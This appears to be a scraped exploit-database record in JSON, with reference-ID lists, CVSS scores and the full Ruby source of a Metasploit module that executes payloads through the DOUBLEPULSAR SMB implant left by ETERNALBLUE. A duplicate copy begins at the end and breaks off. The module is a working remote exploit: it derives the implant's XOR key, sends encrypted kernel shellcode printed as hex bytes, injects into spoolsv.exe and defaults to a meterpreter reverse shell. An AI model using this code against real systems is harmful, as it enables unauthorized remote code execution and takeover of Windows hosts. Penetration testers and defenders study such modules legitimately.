"MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-14T08:21:09", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-14T08:21:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T08:21:09", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "4f951f3d4f30f6a5406165c9984da9ef", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-14T22:26:47", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-14T22:26:47", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-14T22:26:47", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 